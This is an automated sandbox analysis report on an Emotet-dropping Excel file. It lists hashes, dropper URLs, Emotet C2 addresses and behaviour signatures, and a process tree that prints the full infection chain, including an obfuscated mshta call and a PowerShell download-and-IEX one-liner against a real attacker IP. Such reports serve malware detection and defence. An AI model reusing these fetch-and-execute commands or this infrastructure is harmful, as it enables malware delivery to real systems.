Analysis

  • max time kernel
    120s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-01-2022 00:44

General

  • Target

    Data 2801.xls

  • Size

    36KB

  • MD5

    ba3893929ffe3930a9b3352dc0a84089

  • SHA1

    0f263d18804644f804093130001f9b315d6223ac

  • SHA256

    17d890cb97a2f9cf9919ab6679578e610b079458580d7b625314641a4c1d4180

  • SHA512

    abad39ee818d8ed6d4a4cc709a36aa5913079c332e5782f750048e824c58c1d39fb533ccb0e2ef4c49e8ed9d3d4ce842481235951ee52bc22f8fcd24ffc5ee4f

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/oo/aa/se.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/oo/aa/se.png

Extracted

Family

emotet

Botnet

Epoch5

C2

159.69.43.124:8080

45.79.80.198:443

207.148.81.119:8080

128.199.192.135:8080

118.98.72.86:443

217.182.143.207:443

168.197.250.14:80

116.124.128.206:8080

78.46.73.125:443

185.148.168.15:8080

195.154.146.35:443

85.214.67.203:8080

194.9.172.107:8080

59.148.253.194:443

210.57.209.142:8080

54.38.242.185:443

195.77.239.39:8080

159.69.237.188:443

104.131.62.48:8080

62.171.178.147:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Data 2801.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1532
    • C:\Windows\SysWOW64\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:688
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://91.240.118.168/oo/aa/se.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1464
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1696
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2032
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1704
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1636
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laxlbdzbcrnq\cnvwsmkzllrbmx.xfc",gBVUkNYukYZ
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:776
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laxlbdzbcrnq\cnvwsmkzllrbmx.xfc",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:964

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • \ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • \ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • \ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • \ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • \ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • \ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • \ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • \ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • memory/776-91-0x0000000000240000-0x0000000000267000-memory.dmp
    Filesize

    156KB

  • memory/964-94-0x0000000000740000-0x0000000000767000-memory.dmp
    Filesize

    156KB

  • memory/964-102-0x0000000002510000-0x0000000002537000-memory.dmp
    Filesize

    156KB

  • memory/964-98-0x0000000000CA0000-0x0000000000CC7000-memory.dmp
    Filesize

    156KB

  • memory/964-112-0x0000000002AB0000-0x0000000002AD7000-memory.dmp
    Filesize

    156KB

  • memory/964-100-0x00000000024B0000-0x00000000024D7000-memory.dmp
    Filesize

    156KB

  • memory/964-96-0x00000000007F0000-0x0000000000817000-memory.dmp
    Filesize

    156KB

  • memory/964-110-0x0000000002920000-0x0000000002947000-memory.dmp
    Filesize

    156KB

  • memory/964-108-0x0000000002880000-0x00000000028A7000-memory.dmp
    Filesize

    156KB

  • memory/964-106-0x00000000026E0000-0x0000000002707000-memory.dmp
    Filesize

    156KB

  • memory/964-104-0x00000000025F0000-0x0000000002617000-memory.dmp
    Filesize

    156KB

  • memory/1532-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1532-58-0x0000000074F11000-0x0000000074F13000-memory.dmp
    Filesize

    8KB

  • memory/1532-56-0x00000000710A1000-0x00000000710A3000-memory.dmp
    Filesize

    8KB

  • memory/1532-114-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1532-55-0x000000002F731000-0x000000002F734000-memory.dmp
    Filesize

    12KB

  • memory/1636-78-0x0000000000440000-0x0000000000467000-memory.dmp
    Filesize

    156KB

  • memory/1636-90-0x00000000027C0000-0x00000000027E7000-memory.dmp
    Filesize

    156KB

  • memory/1636-86-0x0000000002600000-0x0000000002627000-memory.dmp
    Filesize

    156KB

  • memory/1636-84-0x00000000025A0000-0x00000000025C7000-memory.dmp
    Filesize

    156KB

  • memory/1636-82-0x00000000024C0000-0x00000000024E7000-memory.dmp
    Filesize

    156KB

  • memory/1636-80-0x0000000000AA0000-0x0000000000AC7000-memory.dmp
    Filesize

    156KB

  • memory/1636-76-0x00000000001F0000-0x0000000000217000-memory.dmp
    Filesize

    156KB

  • memory/1696-61-0x0000000002670000-0x00000000032BA000-memory.dmp
    Filesize

    12.3MB

  • memory/1696-62-0x0000000004B10000-0x0000000005046000-memory.dmp
    Filesize

    5.2MB

  • memory/1704-69-0x00000000001B0000-0x00000000001D7000-memory.dmp
    Filesize

    156KB